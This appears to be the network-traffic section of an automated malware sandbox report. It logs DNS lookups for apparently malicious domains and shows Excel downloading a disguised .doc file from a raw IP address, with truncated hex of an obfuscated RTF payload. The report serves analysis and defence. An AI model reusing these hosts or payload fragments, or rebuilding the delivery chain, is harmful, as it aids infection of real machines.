                                                      Aug 31, 2024 15:51:46.079611063 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079632044 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079669952 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079680920 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079691887 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079701900 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079703093 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079724073 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079917908 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079929113 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079940081 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079965115 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079987049 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079999924 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080022097 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.080148935 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080161095 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080173016 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080183983 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080193043 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.080208063 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.080308914 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080321074 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080332041 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080354929 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.080395937 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080406904 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080419064 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080439091 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.080439091 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080451012 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080456972 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.080461979 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080473900 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080499887 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.080499887 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.082700968 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.082719088 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.082748890 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.082822084 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.082922935 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.082945108 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.082957029 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.082958937 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.082968950 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.082993031 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.083067894 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.083079100 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.083089113 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.083098888 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.083103895 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.083110094 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.083128929 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.083137989 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.083148003 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.083170891 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.115339041 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115349054 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115354061 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115359068 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115364075 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115367889 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115372896 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115377903 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115381956 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115387917 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115392923 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115397930 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115403891 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115516901 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.115551949 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.142714024 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142735958 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142745972 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142755032 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142765999 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142771006 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142771006 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.142790079 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142798901 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.142800093 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142812014 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142822981 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.142843962 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.142865896 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142877102 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142887115 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142896891 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142908096 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.142914057 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142937899 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.145951033 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.145962000 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.145972013 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146001101 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.146012068 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146027088 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146038055 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146049023 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146051884 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.146070004 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.146090984 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146107912 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146119118 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146128893 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146131039 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.146138906 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146152020 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.146178961 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.146281958 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:49.473576069 CEST4917480192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:49.478656054 CEST8049174185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:49.478727102 CEST4917480192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:49.478857994 CEST4917480192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:49.478885889 CEST4917480192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:49.483880997 CEST8049174185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:49.483963013 CEST8049174185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:49.483972073 CEST8049174185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:50.536051035 CEST8049174185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:50.730698109 CEST4917480192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:50.936362028 CEST4917480192.168.2.22185.251.91.119
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 31, 2024 15:50:57.289438009 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 15:50:57.296216965 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 15:50:59.218322039 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 15:50:59.232013941 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 15:51:00.309302092 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 15:51:00.318290949 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 15:51:00.320230961 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 15:51:00.326956987 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 15:51:04.806396008 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 15:51:04.813397884 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 15:51:04.814671040 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 15:51:04.821609020 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 15:51:10.329627037 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 15:51:10.338493109 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 15:51:10.340023994 CEST | 54998 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 15:51:10.347018003 CEST | 53 | 54998 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 15:51:18.990689993 CEST | 52781 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 15:51:19.002280951 CEST | 53 | 52781 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 15:51:44.164791107 CEST | 63926 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 15:51:44.265943050 CEST | 53 | 63926 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 15:51:44.269380093 CEST | 65510 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 15:51:44.375876904 CEST | 53 | 65510 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 15:51:49.341362000 CEST | 62672 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 15:51:49.353054047 CEST | 53 | 62672 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 15:51:49.365849972 CEST | 56475 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 15:51:49.472837925 CEST | 53 | 56475 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 31, 2024 15:50:57.289438009 CEST | 192.168.2.22 | 8.8.8.8 | 0xd1d0 | Standard query (0) | crash.sh | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:50:59.218322039 CEST | 192.168.2.22 | 8.8.8.8 | 0x964e | Standard query (0) | crash.sh | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:00.309302092 CEST | 192.168.2.22 | 8.8.8.8 | 0xc8a | Standard query (0) | crash.sh | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:00.320230961 CEST | 192.168.2.22 | 8.8.8.8 | 0xd83b | Standard query (0) | crash.sh | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:04.806396008 CEST | 192.168.2.22 | 8.8.8.8 | 0x1100 | Standard query (0) | crash.sh | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:04.814671040 CEST | 192.168.2.22 | 8.8.8.8 | 0x2664 | Standard query (0) | crash.sh | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:10.329627037 CEST | 192.168.2.22 | 8.8.8.8 | 0xb6ec | Standard query (0) | crash.sh | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:10.340023994 CEST | 192.168.2.22 | 8.8.8.8 | 0xd97e | Standard query (0) | crash.sh | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:18.990689993 CEST | 192.168.2.22 | 8.8.8.8 | 0xcfa0 | Standard query (0) | ia803104.us.archive.org | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:44.164791107 CEST | 192.168.2.22 | 8.8.8.8 | 0xa59f | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:44.269380093 CEST | 192.168.2.22 | 8.8.8.8 | 0x575c | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:49.341362000 CEST | 192.168.2.22 | 8.8.8.8 | 0x604a | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:49.365849972 CEST | 192.168.2.22 | 8.8.8.8 | 0xb8ff | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 31, 2024 15:50:57.296216965 CEST | 8.8.8.8 | 192.168.2.22 | 0xd1d0 | No error (0) | crash.sh | | 208.64.171.230 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:50:59.232013941 CEST | 8.8.8.8 | 192.168.2.22 | 0x964e | No error (0) | crash.sh | | 208.64.171.230 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:00.318290949 CEST | 8.8.8.8 | 192.168.2.22 | 0xc8a | No error (0) | crash.sh | | 208.64.171.230 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:00.326956987 CEST | 8.8.8.8 | 192.168.2.22 | 0xd83b | No error (0) | crash.sh | | 208.64.171.230 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:04.813397884 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | crash.sh | | 208.64.171.230 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:04.821609020 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | crash.sh | | 208.64.171.230 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:10.338493109 CEST | 8.8.8.8 | 192.168.2.22 | 0xb6ec | No error (0) | crash.sh | | 208.64.171.230 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:10.347018003 CEST | 8.8.8.8 | 192.168.2.22 | 0xd97e | No error (0) | crash.sh | | 208.64.171.230 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:19.002280951 CEST | 8.8.8.8 | 192.168.2.22 | 0xcfa0 | No error (0) | ia803104.us.archive.org | | 207.241.232.154 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:44.265943050 CEST | 8.8.8.8 | 192.168.2.22 | 0xa59f | No error (0) | prolinice.ga | | 185.251.91.119 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:44.375876904 CEST | 8.8.8.8 | 192.168.2.22 | 0x575c | No error (0) | prolinice.ga | | 185.251.91.119 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:49.353054047 CEST | 8.8.8.8 | 192.168.2.22 | 0x604a | No error (0) | prolinice.ga | | 185.251.91.119 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 15:51:49.472837925 CEST | 8.8.8.8 | 192.168.2.22 | 0xb8ff | No error (0) | prolinice.ga | | 185.251.91.119 | A (IP address) | IN (0x0001) | false
• crash.sh
• ia803104.us.archive.org
• 23.94.148.16
• wrbvhkkkwfg.com
• prolinice.ga
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49162 | 23.94.148.16 | 80 | 3416 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
Aug 31, 2024 15:50:58.102224112 CEST | 477 | OUT | GET /90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc HTTP/1.1
                                                      Accept: */*
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: 23.94.148.16
                                                      Connection: Keep-Alive
Aug 31, 2024 15:50:58.600771904 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                      Date: Sat, 31 Aug 2024 13:50:58 GMT
                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                      Last-Modified: Thu, 29 Aug 2024 23:32:52 GMT
                                                      ETag: "19045-620dae4b80f82"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 102469
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: application/msword
                                                      Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 0d 09 09 09 09 09 09 09 7b 5c 2a 5c 6c 65 76 65 6c 6e 75 6d 62 65 72 73 31 38 30 35 37 39 32 34 30 20 5c 25 7d 0d 7b 5c 32 38 35 35 34 38 35 32 25 3b 2a 36 2c 5b 3c 3f 7c 2a 3b 40 39 3f 28 3f 28 38 30 3f 2e 21 24 27 40 a7 40 7c 2a 3f 3f 3d 7e 2d 31 3f 33 33 37 31 2a 37 21 3c 5f 2e 34 23 2d 2c 39 28 3f 2e 29 2e b5 7e 5f 23 23 3b 33 3f 2b a7 37 2c 28 7e 2b 3c 3c 3f 29 29 21 29 b5 31 3e 23 5f 5f 35 2e 2e 3c 3a 2e 39 27 5e 7e 32 3d 30 35 38 25 5d 3a 40 34 7c 2b 33 31 29 a7 5e 3b 3f 3f b5 38 25 3d 3d 39 5b 2b 5f 38 2a 31 24 5e 25 2d 25 37 5d 40 3f 2d 2a 2a 35 3b 2b 26 28 24 7e 3f 3d 25 2c 3c 35 37 39 3b 3f 60 5d 40 31 33 3e 33 3b 28 36 3a 24 31 29 60 32 2a 3f 36 40 7c 3c 21 5b 39 37 32 2b 21 3a 31 60 3f 32 3c 2b 34 2f 7e 34 3b 34 b0 28 b0 39 26 3e 5e 5d 26 3f 35 32 30 5e 3f 2f 28 34 2e 60 b5 25 2e 27 25 3b 33 b0 3f 30 3c 36 40 5e 35 3e 25 35 7c 3b 2c 2e 38 3f 2a 35 32 2a 26 3e 24 3f 5f 38 24 b0 5f 31 3e 2c 5e 7c 29 29 2e 36 60 3c 7e 3f 40 27 3e 3f 25 7e 3f 3f 3e 38 3c 3f [TRUNCATED]
                                                      Data Ascii: {\rtf1{\*\levelnumbers180579240 \%}{\28554852%;*6,[<?|*;@9?(?(80?.!$'@@|*??=~-1?3371*7!<_.4#-,9(?.).~_##;3?+7,(~+<<?))!)1>#__5..<:.9'^~2=058%]:@4|+31)^;??8%==9[+_8*1$^%-%7]@?-**5;+&($~?=%,<579;?`]@13>3;(6:$1)`2*?6@|<![972+!:1`?2<+4/~4;4(9&>^]&?520^?/(4.`%.'%;3?0<6@^5>%5|;,.8?*52*&>$?_8$_1>,^|)).6`<~?@'>?%~??>8<?243>9-|`?$*966^'3+;-'5*+=+<4&808?7:|10.91!62^8*2[]?<#:&:2>%%5-8??%!%5)+?3(9?.5[~2'`?]88?>?&8+[2'*|?4^/>?=>3[&%!|_/9[;'#?|`+?@%606=#)4^?/`~9~,#1@=$$<&?@.$?5%'1*[7,472?2!9+^@0!?,>7324+<^3$$^89%,?#`==2+/_&)`#:?8(?;@4?>9_<8]1?)&0#1&!?[@(_^:&)(+[!0%<:'.|``]0|?;_?9.!>_1]?8%].(%7^;(+@?,!=]?'%#???4%2*???&5.]5&&~;#%?@%=(()-%^%0|?__]3%]_7`)^+3(+%!%%-]^)?>??=.)%=_*$:;?($%%91,*0$/<&[38$?|:=6.!9.$6/1+??%%-2<.#,%>![_?*>#@2;_67)/74|`??;&#1&6|,|1(9?3-36??%,2?`?8>@~*-274-&-0)1,&8.=528=29>6?|8>^(?/@]+?!'<(@*#0)|)32;2[?[.*?*;?`4=#-:`4?.^0-?[1*-8]'6_?57)%|
Aug 31, 2024 15:50:58.600795984 CEST | 1236 | IN | Data Raw: 26 25 2e 7e 25 34 3f 28 2c 25 5d 3b 7e 5d 28 a7 b5 7c 60 36 27 31 a7 a7 2c 3f 21 24 b0 23 40 5f 25 23 60 60 3b a7 3d 7e 2b 27 28 5b 3f 37 5f b5 2a 34 31 34 2c 34 2f 34 3f 5f 35 40 32 30 38 24 3f 3b 60 a7 3f 3f 7c 3f 3a 32 7c b5 36 21 3f 21 29 39
                                                      Data Ascii: &%.~%4?(,%];~](|`6'1,?!$#@_%#``;=~+'([?7_*414,4/4?_5@208$?;`??|?:2|6!?!)9?*^???*#`1)(`'4??/<2.;6?55?'.9?+<8>|7<.1.1[%?*62@9,>!@*~==)&_7-~2??0#~9$6]|#/~7=#82|$|:1[!?'&+5,9#;+?2~;+?#[%;~9?1)0;>?=?:%40??_^~|)46%@+3~*!#%0`$802(~]
Aug 31, 2024 15:50:58.600806952 CEST | 1236 | IN | Data Raw: 5f 28 23 2c 38 2f 5f 26 2e 29 21 40 39 3f 34 27 3c 3d 60 3f 2a b5 3a 37 2c 39 2a 3f 27 3e 31 34 2c 31 31 b0 26 39 2a 37 2b 3f 36 7c 5b 23 40 2a 25 2c 2c 23 3c 5f 5d 5b 35 33 3a 39 23 2e 33 25 3c 5e 35 b5 24 3b 2c 2c 25 40 31 3c 3e 3c 60 3a 25 3f
                                                      Data Ascii: _(#,8/_&.)!@9?4'<=`?*:7,9*?'>14,11&9*7+?6|[#@*%,,#<_][53:9#.3%<^5$;,,%@1<><`:%?-6'^'$3?=?5)<8>1+>*|>$-|^%2?;=&/?`))(@'=1$<%=9<<`6|*;,(.@~3=8~?;-.<?2);%@1@'2%+'/%~>$528_?^*8`>9*4(5]%'%5,?0^=!;&?8;,][!.;,?&*<=^68?=`5_75?-7+3$%;%/+,|>#?_
Aug 31, 2024 15:50:58.600816965 CEST | 1236 | IN | Data Raw: 28 3f 37 24 27 23 b5 2a 5b 31 3f 3b 3f 2b 33 3a 5e 24 40 2d 3b 2a 3e 5f 36 31 5b 25 7c 27 3c 40 5e 3b 30 a7 60 5f a7 5d 3e 3c 3d 2e 3b 5d 3c 5e 40 2a 34 2e 3f 29 40 29 34 60 3b 3f 33 23 2e 34 21 29 2c 3d 29 3c 25 2d 23 b5 5b 2a 3f 60 36 26 26 2c
                                                      Data Ascii: (?7$'#*[1?;?+3:^$@-;*>_61[%|'<@^;0`_]><=.;]<^@*4.?)@)4`;?3#.4!),=)<%-#[*?`6&&,|~*+6'70')]8%<&_!%-4&3?]|%^#^.=7!>>(39_$%@`@2=~7`(@&=#@</;-%|''>`00[40;.&&9.;.3+62?-.3';@?8$#?/%=5[@%#74$:??1+?<`$`~^^*);/<*?[%~#$^/9$4;8.)0,@@1:8>;1
Aug 31, 2024 15:50:58.600827932 CEST | 1236 | IN | Data Raw: 34 35 3b 34 3f 36 3c 38 2a 2e b5 24 38 28 5b 35 5f 3e 30 3f 30 3a 39 2b 30 33 b0 25 21 3f 40 29 21 3d 5d 2a 60 3c 3a 2c 5e 31 b0 2a 3f 37 5d 34 3f 7c 21 23 3f 2a 3b 3f 30 2f 3c 5e 30 25 39 36 38 31 38 3f 34 21 3e 3f 21 21 3e 23 25 5d 2b 24 60 32
                                                      Data Ascii: 45;4?6<8*.$8([5_>0?0:9+03%!?@)!=]*`<:,^1*?7]4?|!#?*;?0/<^0%96818?4!>?!!>#%]+$`2(<&+53<.7:09?.5=]=%<%!=?^^$_>=54;%|^'(])_.6@&(0%*.'114?_=#,?-!3??4_~$|&?>'%)])@,%-^)15^(998/0965_8/^;~#)4<-#|,;/?!?)?_0)(.?~6+|^%/:]?*+'64<?&44=#+
Aug 31, 2024 15:50:58.600832939 CEST | 1236 | IN | Data Raw: 20 09 20 09 09 20 20 09 09 09 09 09 09 20 20 09 09 09 20 09 20 20 20 09 20 20 20 20 20 20 09 09 20 20 20 20 20 20 20 20 09 20 09 20 09 09 09 20 20 20 09 20 09 09 09 20 09 20 09 09 20 20 20 20 39 0a 0a 0d 0d 0d 0d 0a 0a 0a 0a 0d 0a 0a 0d 0a 0d 0d
                                                      Data Ascii: 9b30 402
Aug 31, 2024 15:50:58.600842953 CEST | 1236 | IN | Data Raw: 09 20 20 20 20 20 09 09 20 20 20 20 30 30 09 20 09 09 09 20 20 20 20 20 09 20 09 20 09 09 20 20 09 20 20 20 09 20 09 20 09 20 09 20 09 20 20 09 09 09 20 09 20 20 09 09 20 09 20 09 09 09 20 09 20 20 20 20 20 09 20 09 20 20 20 20 20 09 09 20 20 20
                                                      Data Ascii: 00 000000 0000e607000002d
Aug 31, 2024 15:50:58.600852013 CEST | 1236 | IN | Data Raw: 09 09 09 20 09 20 20 20 20 09 09 09 20 20 20 20 20 09 20 20 09 20 09 20 20 09 09 09 20 20 20 09 09 20 09 20 20 20 09 09 09 20 20 09 20 09 09 09 20 09 20 09 20 09 09 09 20 20 20 20 30 35 20 20 09 20 09 20 20 20 09 09 09 20 09 20 20 09 20 20 20 09
                                                      Data Ascii: 05 49 e7a7
Aug 31, 2024 15:50:58.600862026 CEST | 1236 | IN | Data Raw: 31 63 0d 0d 0d 0d 0d 0d 0a 0a 0a 0a 0d 0a 0a 0d 0d 0d 0d 0d 0a 0d 0a 32 20 09 20 09 09 09 09 20 09 09 20 20 09 09 09 09 20 09 20 20 20 20 09 09 20 20 09 09 09 20 20 09 09 09 09 20 09 20 09 20 09 09 09 20 20 09 20 20 20 09 20 09 20 09 09 20 20 20
                                                      Data Ascii: 1c2 3407baaa d4
Aug 31, 2024 15:50:58.600872993 CEST | 1236 | IN | Data Raw: 09 20 09 20 09 09 09 09 20 20 20 09 20 09 09 09 20 20 09 09 09 20 09 20 20 20 20 09 20 09 09 09 20 09 09 09 20 20 09 09 65 0d 0a 0a 0a 0d 0d 0a 0d 0a 0d 0a 0d 0d 0a 0a 0a 0d 0a 0d 0d 0d 61 09 20 09 09 09 09 20 20 20 20 20 20 09 20 09 20 09 20 20
                                                      Data Ascii: ea 09c8 c
Aug 31, 2024 15:50:58.605952024 CEST | 1236 | IN | Data Raw: 20 09 20 09 20 20 09 09 09 09 20 09 09 09 09 09 20 09 20 20 20 09 09 20 20 09 20 09 20 20 09 20 09 20 09 20 09 20 20 09 20 09 20 09 20 09 09 09 09 20 20 09 09 31 34 66 20 20 09 20 20 20 09 20 09 20 09 09 20 09 20 20 20 09 20 09 20 20 09 09 09 09
                                                      Data Ascii: 14f 067f c


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
